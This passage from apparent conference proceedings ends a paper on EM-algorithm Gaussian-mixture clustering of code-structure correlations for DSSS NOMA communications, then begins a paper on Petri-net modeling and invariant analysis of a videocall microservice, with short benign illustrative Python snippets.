$\mu^2 = \big(-0.5,\ -0.5,\ -0.5,\ -0.5,\ -0.25,\ -0.25,\ 0,\ 0,\ 0.25,\ 0.25,\ 0.5,\ 0.75,\ 0.75,\ 0.75\big)$;
$\sigma^2 = \big(0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0,\ 0\big)$.
7. Iteration $s = 3$, the E-step: the log-likelihood function $L(\omega|\tilde{r})$ cannot be calculated at $\omega^2$ due to the formed mathematical singularity (typically identified during calculations as "division by zero"). As will be seen below, this singularity is complex and simultaneously meets all the criteria 1, 2, and 3.
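The removal criteria of Sect. 2.3 can be checked mechanically on such intermediate results; the sketch below encodes one possible reading of the non-stringent conditions, where the tolerance values are illustrative assumptions (the authors additionally inspect the posterior probabilities γ, so threshold choices here would need tuning in practice):

import numpy as np

def check_criteria(d_k, sigma_s, theta_s, K, tol=1e-6):
    """Label clusters by criteria 1-3; thresholds are illustrative only."""
    labels = []
    for d, sg, th in zip(d_k, sigma_s, theta_s):
        if sg < tol and d < tol and th * K < tol:
            labels.append("criterion 1: empty cluster, remove")
        elif sg < tol and abs(d - 1.0) < tol:
            labels.append("criterion 2: single trivial element, remove cluster")
        elif sg < tol and d > 1.0:
            labels.append("criterion 3: identical elements, remove code structures")
        else:
            labels.append("keep")
    return labels

# Toy example with three clusters of sizes 0, 1, and 2, all with sigma = 0:
print(check_criteria([0.0, 1.0, 2.0], [0.0, 0.0, 0.0], [0.0, 0.3, 0.7], K=3))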
5 Discussion
An analysis of the obtained results is presented below.
1. Clusters $k = 1$ and $k = 12$ meet criterion 1. They are empty (do not contain elements) and must be removed in further analysis. Note that clusters $k = 2$, $k = 4$, $k = 5$, $k = 10$, and $k = 13$ are also close to the conditions of criterion 1, but only clusters $k = 1$ and $k = 12$ meet the stringent conditions. In this case the calculated posterior probabilities are $\gamma_{j,1}^{1} = 0$ and $\gamma_{j,12}^{1} = 0$, $j = \overline{1, D}$, $D = 28$.
2. Cluster $k = 11$ meets criterion 2. It contains only one element and must be removed in further analysis, because this one selected element $\tilde{r}_{26} = R_{8,5}$ in the cluster is trivial (it has been identified using the posterior probabilities $\gamma^1$, where $\gamma_{26,11}^{1} = 1$). The element $\tilde{r}_{26}$ remains in the input data $\tilde{r}$ for a further analysis (it will take place without the removed cluster $k = 11$), if required.
3. Clusters $k = 3$, $k = 6$, and $k = 9$ meet criterion 3. Cluster $k = 3$ contains the elements $\tilde{r}_9 = R_{5,3}$ and $\tilde{r}_{23} = R_{8,2}$; they have been identified using the posterior probabilities $\gamma^1$, where $\gamma_{9,3}^{1} = 1$ and $\gamma_{23,3}^{1} = 1$. Cluster $k = 6$ contains the elements $\tilde{r}_1 = R_{2,1}$, $\tilde{r}_2 = R_{3,1}$, $\tilde{r}_5 = R_{4,2}$, $\tilde{r}_{10} = R_{5,4}$, $\tilde{r}_{13} = R_{6,3}$, and $\tilde{r}_{27} = R_{8,6}$; they have been identified using the posterior probabilities $\gamma^1$, where $\gamma_{1,6}^{1} = \gamma_{2,6}^{1} = \gamma_{5,6}^{1} = \gamma_{10,6}^{1} = \gamma_{13,6}^{1} = \gamma_{27,6}^{1} = 1$. Cluster $k = 9$ contains the elements $\tilde{r}_6 = R_{4,3}$, $\tilde{r}_{12} = R_{6,2}$, $\tilde{r}_{15} = R_{6,5}$, $\tilde{r}_{17} = R_{7,2}$, $\tilde{r}_{18} = R_{7,3}$, $\tilde{r}_{20} = R_{7,5}$, $\tilde{r}_{25} = R_{8,4}$, and $\tilde{r}_{28} = R_{8,7}$; they have been identified using the posterior probabilities $\gamma^1$, where $\gamma_{6,9}^{1} = \gamma_{12,9}^{1} = \gamma_{15,9}^{1} = \gamma_{17,9}^{1} = \gamma_{18,9}^{1} = \gamma_{20,9}^{1} = \gamma_{25,9}^{1} = \gamma_{28,9}^{1} = 1$.

The practical significance of the results, which have been obtained using the modification of the EM-algorithm, boils down to a robust unsupervised clustering of code structures using their cross-correlations for low power environment friendly DSSS NOMA communications. During the clustering, due to the introduced criteria, the clusters which match the cross-correlations $R = -1/2$ (cluster $k = 3$), $R = -1/4$ (cluster $k = 6$), $R = 1/4$ (cluster $k = 9$), and $R = 1/2$ (cluster $k = 11$) have been found automatically. This part of the clustering is characterized by robust results, because in conditions of a priori uncertainty about the initial model parameters $\omega^0$, all elements $\tilde{r}$ which match the cross-correlations $R = -1/2$, $R = -1/4$, $R = 1/4$, and $R = 1/2$ have been identified with the related posterior probabilities $\gamma^1 = 1$. A further analysis of the clusters using $D^1$, $\omega^2$, and $\gamma^1$ shows that in clusters $k = 7$ and $k = 8$ all elements $\tilde{r}$ which match the cross-correlation $R = 0$ can be easily identified, i.e., the elements $\tilde{r}_3 = R_{3,2}$, $\tilde{r}_4 = R_{4,1}$, $\tilde{r}_8 = R_{5,2}$, $\tilde{r}_{11} = R_{6,1}$, $\tilde{r}_{14} = R_{6,4}$, $\tilde{r}_{16} = R_{7,1}$, $\tilde{r}_{19} = R_{7,4}$, $\tilde{r}_{21} = R_{7,6}$, and $\tilde{r}_{24} = R_{8,3}$. In the same way, the analysis of the clusters using $D^1$, $\omega^2$, and $\gamma^1$ shows that in clusters $k = 13$ and $k = 14$ all elements $\tilde{r}$ which match the cross-correlation $R = 3/4$ can be easily identified, i.e., the elements $\tilde{r}_7 = R_{5,1}$ and $\tilde{r}_{22} = R_{8,1}$. The rest of the clusters, i.e., clusters $k = 2$, $k = 4$, $k = 5$, and $k = 10$, can be taken as empty, because the related values $D^1 \ll 1$ for them ($D^1 \leq 2.7\cdot 10^{-6}$). Thus, all elements $\tilde{r}$ have been clustered correctly according to the set of values $R \in \{0, \pm\frac{1}{4}, \pm\frac{1}{2}, \frac{3}{4}\}$ which characterizes the input data $\tilde{r}$.
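As a simple cross-check of this interpretation, the recovered clusters can be compared against a direct grouping of equal correlation values; this is only a sanity check on the 28 values listed above, not part of the proposed technique:

from collections import defaultdict
from fractions import Fraction as F

# The 28 mixture elements, copied from the text above (1-based indices j).
r = [F(-1, 4), F(-1, 4), 0, 0, F(-1, 4), F(1, 4), F(3, 4), 0, F(-1, 2), F(-1, 4),
     0, F(1, 4), F(-1, 4), 0, F(1, 4), 0, F(1, 4), F(1, 4), 0, F(1, 4),
     0, F(3, 4), F(-1, 2), 0, F(1, 4), F(1, 2), F(-1, 4), F(1, 4)]

groups = defaultdict(list)
for j, value in enumerate(r, start=1):
    groups[value].append(j)
for value in sorted(groups):
    print(f"R = {value}: elements {groups[value]}")
# Expected: 2 elements at -1/2, 6 at -1/4, 9 at 0, 8 at +1/4, 1 at +1/2,
# and 2 at +3/4, matching the clusters discussed above.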
Such clustering can be used to organize and control the processes at the physical layer of low power environment friendly DSSS NOMA communications.
6 Conclusions
The machine learning technique based on the Gaussian mixture model for environment friendly communications is proposed in the paper. The proposed technique uses the developed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model and the introduced additional clustering criteria for a deep statistical analysis of cross-correlations between code structures, and it focuses on applications related to low power environment friendly DSSS NOMA communications. The introduction and justification of additional clustering criteria in the EM-algorithm are closely related to its features (sensitivity to initial parameters, a priori uncertainty about the number of components of the described model, the need to take into account the specific nature of the problem, and the possible occurrence of mathematical singularities and indeterminate forms during the iterative procedures of the EM-algorithm), which have been analyzed in detail in the paper. The content of the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model includes the justification of the structural model parameter, which is the initial number of components of a mixture, of the initial model parameters, and of three additional clustering criteria for adjusting the procedures of the EM-algorithm under conditions of mathematical singularities in the log-likelihood function used in the EM-algorithm (two lemmas are proved in the paper for the justification of these criteria). An example of the operation of the proposed technique is presented and analyzed. It is shown that the practical significance of the proposed machine learning technique boils down to a robust unsupervised clustering of code structures using their cross-correlations, which can be used to organize and control the processes at the physical layer of low power environment friendly DSSS NOMA communications. The prospect for further research is the development of a modification of the random forest machine learning algorithm for environment friendly communications.
References
1. Balusamy, B., Abirami, R.N., Kadry, S., Gandomi, A.H.: Cluster analysis. In: Big Data: Concepts, Technology, and Architecture. Wiley, Hoboken (2021)
2. Zhu, J., et al.: ECRKQ: machine learning-based energy-efficient clustering and cooperative routing for mobile underwater acoustic sensor networks. IEEE Access 9, 70843–70855 (2021). https://doi.org/10.1109/ACCESS.2021.3078174
3. Alekseeva, D., et al.: Comparison of machine learning techniques applied to traffic prediction of real wireless network. IEEE Access 9, 159495–159514 (2021). https://doi.org/10.1109/ACCESS.2021.3129850
4. Xu, Q., et al.: Roadside estimation of a vehicle's center of gravity height based on an improved single-stage detection algorithm and regression prediction technology. IEEE Sens. J. 21(21), 24520–24530 (2021). https://doi.org/10.1109/JSEN.2021.3114703
5. Jang, K.J., et al.: Rain attenuation prediction model for terrestrial links using Gaussian process regression. IEEE Commun. Lett. 25(11), 3719–3723 (2021). https://doi.org/10.1109/LCOMM.2021.3109619
6. Agbinya, J.I.: Hidden Markov Modelling (HMM). In: Applied Data Analytics – Principles and Applications. River Publishers, Gistrup (2020)
7. Piho, L., Kruusmaa, M.: Subsurface flow path modeling from inertial measurement unit sensor data using infinite hidden Markov models. IEEE Sens. J. 22(1), 621–630 (2022). https://doi.org/10.1109/JSEN.2021.3128838
8. Liu, C., Song, W., Lu, C., Xia, J.: Spatial-temporal hidden Markov model for land cover classification using multitemporal satellite images. IEEE Access 9, 76493–76502 (2021). https://doi.org/10.1109/ACCESS.2021.3080926
9. Sustainable Development Goals | United Nations Development Programme (2021). https://www.undp.org/sustainable-development-goals
10. Micheletti, J.A., Godoy, E.P.: Improved indoor 3D localization using LoRa wireless communication. IEEE Lat. Am. Trans. 20(3), 481–487 (2022). https://doi.org/10.1109/TLA.2022.9667147
11. Chew, D., Adams, A.L., Uher, J.: Intelligent radio concepts. In: Wireless Coexistence: Standards, Challenges, and Intelligent Solutions. Wiley, Hoboken (2021)
12. Middlestead, R.W.: Spread-spectrum communications. In: Digital Communications with Emphasis on Data Modems: Theory, Analysis, Design, Simulation, Testing, and Applications. Wiley, Hoboken (2017)
13. Kopta, V., Enz, C.: Ultra-Low Power FM-UWB Transceivers for IoT. River Publishers, Gistrup (2019)
14. Zhong, R., et al.: AI empowered RIS-assisted NOMA networks: deep learning or reinforcement learning? IEEE J. Sel. Areas Commun. 40(1), 182–196 (2022). https://doi.org/10.1109/JSAC.2021.3126068
15. Holubnychyi, A.H., Konakhovych, G.F.: Multiplicative complementary binary signal-code constructions. Radioelectron. Commun. Syst. 61(10), 431–443 (2018). https://doi.org/10.3103/S0735272718100011
16. Holubnychyi, A.G., Konakhovych, G.F., Taranenko, A.G., Gabrousenko, Ye.I.: Comparison of additive and multiplicative complementary sequences for navigation and flight control systems. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kiev, Ukraine, pp. 24–27 (2018). https://doi.org/10.1109/MSNMC.2018.8576275
17. Holubnychyi, A.G., Konakhovych, G.F., Odarchenko, R.S.: Signal constructions with low resultant sidelobes for pulse compression navigation and radar systems. In: IEEE 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kiev, Ukraine, pp. 267–270 (2016). https://doi.org/10.1109/MSNMC.2016.7783158
18. Yu, D., Deng, L.: Gaussian mixture models. In: Yu, D., Deng, L. (eds.) Automatic Speech Recognition. Signals and Communication Technology, pp. 13–21. Springer, London (2015). https://doi.org/10.1007/978-1-4471-5779-3_2
19. Huang, T., Peng, H., Zhang, K.: Model selection for Gaussian mixture models. Stat. Sin. 27, 147–169 (2017). https://doi.org/10.5705/ss.2014.105
20. Dempster, A.P., Laird, N.M., Rubin, D.B.: Maximum likelihood from incomplete data via the EM algorithm. J. R. Stat. Soc. Ser. B 39(1), 1–38 (1977)
21. Gupta, M.R.: Theory and use of the EM algorithm. Found. Trends® Signal Process. 4(3), 223–296 (2010). https://doi.org/10.1561/2000000034
22. Vlassis, N., Likas, A.: A greedy EM algorithm for Gaussian mixture learning. Neural Process. Lett. 15, 77–87 (2002). https://doi.org/10.1023/A:1013844811137
Applying a Combined Approach to Modeling of Software Functioning Oksana Suprunenko(B) , Borys Onyshchenko, Julia Grebenovych, and Petro Nedonosko The Bohdan Khmelnytsky National University of Cherkasy, Cherkasy, Ukraine [email protected]
Abstract. The purpose is to research the effectiveness of using a combined approach to the simulation modeling of software. The tasks of the work are: the development of a convolution method that reduces the dimension of the model without losing elements of parallel and concurrent processes; the construction of a simulation model of software with parallelism for the analysis of its dynamic properties and the formation of design solutions without functional disadvantages. The object of research is the Petri-nets-based simulation model of software with parallelism. The subject of research is the functional disadvantages of simulation models with parallelism and the ways to correct them. The results of the research are: the convolution method and an example of its use in the analysis of dynamic properties of models with parallelism; the testing of the methodology for detecting and correcting functional disadvantages in reduced simulation models of software components.
Keywords: Petri nets · simulation model of the software component with parallelism · convolution method · combined approach to simulation of systems with parallelism
1 Introduction
A software system is a set of related components that interact to achieve the set goals [1] and are characterized by structural features determined by functionality and information complexity. The most important and complex part of its modeling is the description and analysis of the interaction of parallel and concurrent processes [2] at the intra-component and inter-component levels, which is necessary to estimate the working capacity and reliability of the system. Technologies of simulation modeling have proven to be the most effective for modeling the dynamic aspects of systems with parallelism [3, 4]. Among the most effective are simulation models based on Petri nets (PNs) [5]. When analyzing PNs, such characteristics of software systems as liveness and reachability [6], repeatability, preservation, and controllability [7] are determined, which is important to ensure the intended functioning of the software, as well as to reduce the cost of development and support of software systems. Limited Petri nets (finite-capacity nets) are used to build simulation models for solving applied problems. Currently, solutions to the problems of the analysis of component
PNs [8], nested PNs [9], and other Petri nets [5] that are associated with hierarchical Petri nets [10] are being investigated. For the estimation of Petri nets, the analysis tasks are solvable [11]. Such an interpretation of PNs is used in this paper to describe models of software systems for their simulation modeling and analytical research [2]. In addition, it is used in combination with hierarchical PNs for block modeling [12], because Petri nets are closed with respect to finite substitution [10]. This allows them to be used for modeling large and complex systems, as it involves a step-by-step analysis of their components [13]. Applied aspects of the use of a combined approach to the simulation modeling of systems with parallelism are considered. In particular, it is proposed to solve the problem of the rapid increase in dimension when assembling a software model from its components. This is necessary for the dynamic analysis of PN models, in which a significant limiting factor is the dimension of the model. A significant increase in the dimension of the model when applying the method of invariants [7] leads to an exponential increase in the time for calculating the minimum set of invariants. To solve this problem, a convolution method is proposed, after which only elements with parallelism, concurrent processes, and other complex structures associated with parallelism are left in the reduced model. An example of the use of the combined approach to the simulation modeling of a videocall microservice and the analysis of its dynamic properties is given. The purpose of the paper is to investigate the effectiveness of a combined approach to the simulation modeling of systems with parallelism on the example of a videocall microservice. The tasks of the research are the development of the convolution method to reduce the dimension of the model in the analysis of parallel and concurrent processes or mixed structures (parallel threads, cycles, and control vertexes), and the use of the combined approach with the convolution method in the construction of a simulation model of the microservice and its analysis, the detection of disadvantages in the functioning of the microservice, and the verification of the decisions made to eliminate them.
2 Materials and Methods
For the dynamic analysis of PN-models, a significant limiting factor is the dimension of the model. An excessive increase in the dimension of the model when using the method of invariants [7, 11] leads to an exponential increase in the time for calculating the invariants. The problem of convoluting related elements of submodels to reduce the dimensionality of a partial model arises, for example, when assembling a software model from subordinate submodels into a partial model, which is gradually transformed into a model of the software system with parallelism. In the first stage of the analysis, all submodels are analyzed separately, and the influence of inter-component connections and external factors is configured in the control vectors of the respective vertexes. Upon successful completion of the first stage, the debugged submodels are assembled into a model by sequentially connecting submodels to a partial system model. When assembling a model from submodels, the dimension of the partial model grows rapidly. For further modeling using automated analysis tools based on the matrix description and the invariant method, it is necessary to reduce the dimension of the models, which is achieved by convoluting sections of the model that do
not have critical properties (e.g., automatic coverage of the Petri net [14]). However, the possibilities of convolution of submodels are not limited to the task of covering their structure with simpler modifications of Petri nets for which defencelessness properties have been proven. In the convolution method, rules are formulated according to which sections of the network are convoluted into the corresponding vertexes of the partial model in order to reduce its dimension.
Rule 1. A section of a submodel that has one input and one output place vertex and has no connections from internal vertexes to other elements of the model is convoluted into one place vertex. This rule can be applied to sections of two adjacent submodels that correspond to the above constraints. When establishing additional connections with other elements of the model, options for their connection with the convolution vertex through the corresponding transition vertex, for example, through the transition vertex t2 (Fig. 1, b), are considered.
Fig. 1. Example of convolution of weakly connected elements of a submodel
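To make Rule 1 concrete, the following minimal Python sketch collapses such a section into its input place. The Net structure and the function name are illustrative assumptions introduced here, not part of the original method.

```python
# Hypothetical sketch of Rule 1 (Net / convolute_rule1 are illustrative names).
from dataclasses import dataclass, field

@dataclass
class Net:
    places: set = field(default_factory=set)
    transitions: set = field(default_factory=set)
    arcs: set = field(default_factory=set)        # directed (source, target) pairs

def convolute_rule1(net: Net, section: set, p_in: str, p_out: str) -> None:
    """Collapse `section` into its input place p_in, merging p_out into p_in."""
    interior = section - {p_in, p_out}
    outside = (net.places | net.transitions) - section
    # Precondition of Rule 1: no arc connects the interior to the rest of the model.
    for s, t in net.arcs:
        assert not (s in interior and t in outside), "internal vertex feeds outside"
        assert not (s in outside and t in interior), "outside vertex feeds interior"
    # Drop the interior with its arcs, then redirect arcs of p_out to p_in.
    net.arcs = {(s, t) for s, t in net.arcs
                if s not in interior and t not in interior}
    net.arcs = {(p_in if s == p_out else s, p_in if t == p_out else t)
                for s, t in net.arcs}
    net.places -= interior | {p_out}
    net.transitions -= interior
```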
Rule 2. All sections of the submodel covered by automaton and marked Petri nets are convoluted into one place vertex. If the section is bounded by transition vertexes, it is convoluted to the place vertex that precedes it; if this place vertex is overloaded with settings, then to the place vertex that is the output vertex of this section. Thus, the convolution actually occurs into a pair of vertexes η(t_st, p_end).

Rule 3. When convoluting structures of the "critical section" type [15], a group of connected elements containing the elements of the model between the vertexes t_V – t_E is convoluted into a transition vertex.

Rule 4. When arbitrary cyclic constructions are allocated in a submodel or in two adjacent submodels, such constructions are convoluted into a pair of vertexes η(p_st, t_end), in which, if necessary, the corresponding values of the control vectors are set. If there is an output transition vertex to the convoluted place vertex in which the number and weight of input and output arcs do not change, the convolution takes place into a place vertex. Thus, when isolating arbitrary cycles, the convolution occurs into the pair of vertexes p1 and t2 (Fig. 1). The transition vertex t2 is added to preserve the bipartite graph structure of the Petri net. However, there are exceptions in which
such structures are convoluted to a place vertex. For example, when convoluting the structure (Fig. 2, a) into the place vertex p0 (Fig. 2, b), there is no need to add a transition vertex: the connecting role is retained by the vertex t4.
Fig. 2. Example of convolution of cyclic structures to the place vertex
Rule 5. If a branched section of strongly connected elements bounded by transition vertexes is allocated in the submodel, it is convoluted to a transition vertex; if such a section is bounded by place vertexes, it is convoluted to a place vertex or to a structure of the type η(p_st, t_z, p_end) if the adjustment of characteristics (e.g., time characteristics) is required.

Rule 6. If the allocated section of strongly connected elements starts from a place vertex and ends with a transition vertex, it is convoluted into a pair of vertexes η(p_st, t_end), and the control vector at the final transition vertex t_end is checked for debugging. If the convolution section starts at a transition vertex and ends at a place vertex, the convolution is a pair of vertexes η(t_st, p_end), and the characteristics of the final place vertex need to be checked for limitation.

Rule 7. Structures corresponding to PN-patterns of the first subgroup of the second group [14] can be convoluted into a structure of the type η(p_st, t_z, p_end) with adjustment of the input control vector for the transition vertex t_z.

The algorithm of the method is presented in the activity diagram (Fig. 3). At the beginning of the work on the convolution of a submodel or a pair of adjacent submodels, sections characterized by strong connectivity are selected for convolution. It is then determined whether the allocated sections intersect; if such sections are found, the one that has more place and transition vertexes is convoluted. According to the convolution rules, the allocated sections are classified and the type of construction for the convolution of each of them is chosen. The convolution is performed sequentially for each of the selected sections. If a section intersects with another but has fewer vertexes, it is not convoluted, but the convolution of such a section may be considered in subsequent iterations if it conforms to the convolution rules.

The convolution method makes it possible to reduce the large dimension of the partial model formed by combining submodels. The method is a part of the combined approach to the simulation of systems with parallelism [2, 14]. The convolution method is used at the stage of assembling submodels into a partial model of the software for the automated analysis of its dynamic properties.
Fig. 3. Activity diagram of the convolution method for models of systems with parallelism
It can also be used to prepare a submodel for dynamic analysis if the submodel has a large dimension, i.e. if max(|T1|, |P1|) exceeds approximately 40…45. Dynamic analysis of software models makes it possible to evaluate the following characteristics (a small sketch of such a check is given after this list):

• liveness (reachability), which makes it possible to eliminate redundant code and simplifies the testing of software models;
• repeatability, which makes it possible to select components for reuse;
• preservation, which ensures the sustainable functioning of the model;
• controllability, which indicates the correctness and predictability of the model in all possible use cases.
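As an illustration of how such properties can be checked automatically, the following minimal Python sketch computes the rank of an incidence matrix and the invariant coverage for a toy net. It is an assumption-laden sketch: the null-space basis returned here is rational, not the minimal set of nonnegative invariants used in the paper.

```python
# A minimal sketch, assuming the incidence matrix W (|P| x |T|) of a model is
# available as an integer array. T-invariants satisfy W*x = 0 and P-invariants
# y*W = 0; full coverage by nonzero elements and rank(W) = min(|T|, |P|) are
# the criteria used in the paper.
import numpy as np
from sympy import Matrix

W = np.array([[ 1, -1,  0],
              [ 0,  1, -1],
              [-1,  0,  1]])              # toy cycle: 3 places, 3 transitions

rank_W = np.linalg.matrix_rank(W)
t_inv = Matrix(W).nullspace()             # right null space -> T-invariants
p_inv = Matrix(W).T.nullspace()           # left null space  -> P-invariants

def covered(basis, n):
    """True if every position is nonzero in at least one basis vector."""
    return bool(basis) and all(any(v[i] != 0 for v in basis) for i in range(n))

print("rank(W) =", rank_W, " min(|T|,|P|) =", min(W.shape))
print("T-coverage:", covered(t_inv, W.shape[1]),
      " P-coverage:", covered(p_inv, W.shape[0]))
```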
3 Experiments

We will focus on the results of the experimental application of the combined approach [2] to the analysis of the code of a videocall microservice, which operates as a component of the portal of a group of users of a social network of some organization. The microservice supports videocalls for three user categories: authorized users of the portal; customers, as pre-registered users of the portal; and outside users of the system without access to the portal (external guests). Before using the microservice, every customer or portal guest has to choose the videocall service on the web-portal page; external users are invited with a link. The microservice logon authorization recognizes the authorized user, while the customer has to input the name that will be used during the videocall session. Customers log on as authorized users but with restricted access rights: they cannot invite outside users to a videocall. An outside user, after entering a name, waits for a videocall invitation from a portal customer; like portal guests, outside users have restricted access rights.

To describe the operation of the videocall microservice, the model MV-1 (Fig. 4) is used, which covers the verification and logon phases of the three user categories, the user's stay in the call, and the videocall logoff. Simulation modeling uses the base settings of the model μ0(p0) = 5 and μ0(p16) = 2, which means that 5 portal users and 2 invited guests want to connect to the videocall (the token-game mechanics behind such a simulation are sketched after Fig. 4). Portal users can log on by entering a name and a password, or they can stay as guests. On entering the videocall microservice (t0) from the portal, a request (t1 – p2) is made to the server, and there are three variants of server-usage paths (from the place vertex p3):

• to be identified as a user (t3),
• to be identified as a guest (t4),
• to receive an error message and go to the start page (t5 – p20 – t20 – p21 – t21 – p0).

A portal guest makes a choice (at the vertex p5): to go to the start page and input a login and password (t22 – p22 – t23 – p21 – t21 – p0), or to stay as a portal guest (p6, p13). Starting from the transition vertex t8, the data of all users and portal guests are validated, and all users are registered for the future video meeting. If an error occurs in the vertexes t25 (error adding a guest to the list of participants), t27 (error obtaining information about the videocall) or t28 (connection acceptance error), it is processed and the transition to the place vertex p19 is made. If there are no errors, the logon of the portal user (p14) and the guest (p15) into the videocall session is carried out from the vertex p11 through the transition vertexes t13 and t14. The guest can stay in the videocall session or press the "Exit" button (t29) to leave it. An authorized user can allow external guests to log on: they wait for a connection (p16), and if they get a permit (t15) they log on to the videocall session (p15) and have access to the same functions as a portal guest. The authorized user can stay in the videocall (p14) or leave it (t17).

The built model of the videocall microservice MV-1 (Fig. 4) is closed by its structure, that is, the base settings are restored in it (from the transition vertex t30), which is the result of
an analytical study of the model [11]. The invariants for this model have been calculated:

T1 = [5 5 5 0 5 0 5 5 5 5 5 5 5 0 5 2 2 0 7 0 0 0 0 0 0 0 0 0 0 7 1]^T
T2 = [5 5 5 0 5 0 5 5 5 5 5 5 5 0 5 0 0 0 7 2 0 0 0 0 0 0 0 0 0 5 1]^T
T3 = [1 1 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0]^T
T4 = [5 5 5 5 0 0 0 0 5 5 5 5 5 5 0 2 2 5 7 0 0 0 0 0 0 0 0 0 0 2 1]^T
T5 = [5 5 5 5 0 0 0 0 5 5 5 5 5 5 0 0 0 5 7 2 0 0 0 0 0 0 0 0 0 0 1]^T

P = [1 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1]
Fig. 4. Model of videocalls microservice MV-1
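For reference, the token-game mechanics behind such a simulation can be sketched in a few lines of Python. The two-place net below is a stand-in with illustrative pre/post matrices; it does not reproduce the MV-1 structure.

```python
# Illustrative token-game simulation; pre[p, t] / post[p, t] give the tokens
# consumed / produced by transition t in place p.
import random
import numpy as np

pre  = np.array([[1, 0],
                 [0, 1]])
post = np.array([[0, 1],
                 [1, 0]])
mu = np.array([5, 0])                 # base setting, cf. mu0(p0) = 5

for _ in range(100):
    enabled = [t for t in range(pre.shape[1]) if np.all(mu >= pre[:, t])]
    if not enabled:                   # deadlock: no transition can fire
        break
    t = random.choice(enabled)
    mu = mu - pre[:, t] + post[:, t]  # fire t
print("marking after 100 random firings:", mu)
```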
The analysis of the T-invariants has revealed that the branch associated with the repeated transition to the login and password entry page (t22 – p22 – t23 – p21) may not be used in the current work session (zero columns of the T-invariants for the transition vertexes t22 and t23), i.e. the related transition vertexes will never fire. Since zero columns of the T-invariants have also been revealed for the transition vertexes t24, t25, t26, t27 and t28, problems can also arise with the vertexes that describe the saving of the portal guest name in the database of videocall participants (from t24 and t26) and the error handling. In the analysis of the P-invariants, the elements related to the place vertexes p12 and p13 have zero values due to a violation of marking preservation; the same is confirmed by simulation modeling.

In order to analyze several of the above-mentioned problems consistently, we will first divide this model into three submodels and reflect a separate problem in each of them. The first submodel MV-1-1 (Fig. 5) describes the call preparation phases, the second submodel MV-1-2 (Fig. 6) describes the error handling specifics, and the third submodel MV-1-3 (Fig. 7, b) describes videocall processing with an option for the portal user to invite external guests to the call, as well as the videocall session logout.
Fig. 5. The first submodel MV-1-1 of the videocall microservice model MV-1: a) initial MV-1-1, b) after the correction, MV-1-1p
The following values of the T- and P-invariants are obtained from the simulation modeling and analysis of the first submodel MV-1-1 (Fig. 5):

T1 = [1 1 1 0 0 1 0 0 0 0 0 1 1 0 0]^T
T2 = [5 5 5 5 0 0 0 0 5 0 1 0 0 0 0]^T
T3 = [5 5 5 0 5 0 5 5 5 5 1 0 0 0 0]^T

P1 = [5 5 5 5 5 5 5 5 5 0 0 5 5]

In particular, elements connected to individual transition vertexes (including t2) are not covered by nonzero values in the T-invariants, nor are the elements connected to the vertexes p12 and p13 in the P-invariants (Fig. 5, a). These results of the T-invariant analysis show that the path t22 – p22 – t23 – p21, which is connected with password input by the portal guest, may not be exercised in every session, and this function should be moved to the additional optional functions. According to the results of the P-invariant analysis, the model is not preserving: the portal guest statuses are unbalanced, which leads to more labels accumulating in the vertexes p12 and p13 than the number of participants staying at the preparation phase before joining the call. This fact is confirmed by the simulation modeling of the submodel MV-1-1: when the initial marking (μ0(p0) = 5) is restored, a single label is left in the place vertex p12, which means that one of the participants has used the password input to change their guest status to an authenticated user. The analysis reveals that the statuses of the portal guests who go to the initial place vertex p0 through the branch t22 – p22 – t23 – p21 are not canceled, which later leads to an uncontrolled accumulation of labels in the place vertex p12 (the place vertex p13 is connected to this problem as the labels go through it), and this is critical for the submodel functionality. Therefore, the submodel is adjusted; in particular, the arc t4 – p13 is replaced by the arc t6 – p13, which makes it possible to take portal guests into account immediately during the videocall preparation phase.

Thus, during the simulation modeling and the analysis of the invariants of the first submodel MV-1-1, one violation of the preservation property has been found, and the priorities for basic and additional processes (X3) have been identified. The submodel MV-1-1p (Fig. 5, b), with the values of the T- and P-invariants calculated for it, has become
the result of the debugging:

T1 = [5 5 5 5 0 0 0 0 5 0 1 0 0 0 0]^T
T2 = [5 5 5 0 5 0 5 5 5 5 1 0 0 0 0]^T
T3 = [1 1 1 0 0 1 0 0 0 0 0 1 1 0 0]^T
T4 = [1 1 1 0 1 0 0 0 0 0 0 0 1 1 1]^T
P1 = [5 5 5 5 5 5 5 5 5 0 0 5 5]
P2 = [5 5 5 5 0 5 5 0 0 5 5 5 5]

The analysis has revealed that all elements of the T-invariants are covered by nonzero values, so this submodel is live (all transition vertexes are reachable) and repetitive. The coverage of the P-invariants by nonzero elements indicates the limitation and preservation of the submodel. The calculation of the rank of the incidence matrix confirms the rather high controllability of the submodel (rank(W) = 11 < min(|T1|, |P1|) = 13), which means that the majority of the possible markings can be reached from the initial marking. The incomplete controllability of the submodel may be related to its artificial closure for analysis. Thus, the operation of the submodel can be considered quite reliable. Compliance with full controllability will be considered after the submodel is added to the full microservice model.

The second submodel MV-1-2, shown in Fig. 6, a, is corrected based on the results of the analysis. In particular, the analysis has shown that only the first error (t25) is processed for the portal guest, while the second and third errors (t27, t28) are processed for users only, although they may also occur during the work of portal guests. In case of an error, users and guests of the portal go to the main page (p0), and the model should display their logoff (by reducing the labels in the appropriate vertexes p12 or p13).
Fig. 6. The second submodel MV-1-2 of videocalls microservice model MV-1: a) the initial submodel, b) the submodel MV-1-2v after debugging
For the debugged submodel MV-1-2v the following values of the invariants are obtained:

T1 = [5 5 5 5 5 0 5 0 0 0 0 0 0 0 0 1]^T
T2 = [5 5 5 5 0 5 0 5 0 0 0 0 0 0 0 1]^T
T3 = [5 0 0 0 0 5 0 0 5 5 0 0 0 0 0 1]^T
T4 = [5 5 0 0 5 0 0 0 0 0 0 5 0 0 0 1]^T
T5 = [5 5 0 0 0 5 0 0 0 0 0 0 5 0 0 1]^T
T6 = [5 5 5 0 5 0 0 0 0 0 0 0 0 5 0 1]^T
T7 = [5 5 5 0 5 0 0 0 0 0 0 0 0 5 0 1]^T
T8 = [5 0 5 5 5 0 5 0 5 0 5 0 0 0 0 1]^T
T9 = [5 0 5 5 0 5 0 5 5 0 5 0 0 0 0 1]^T
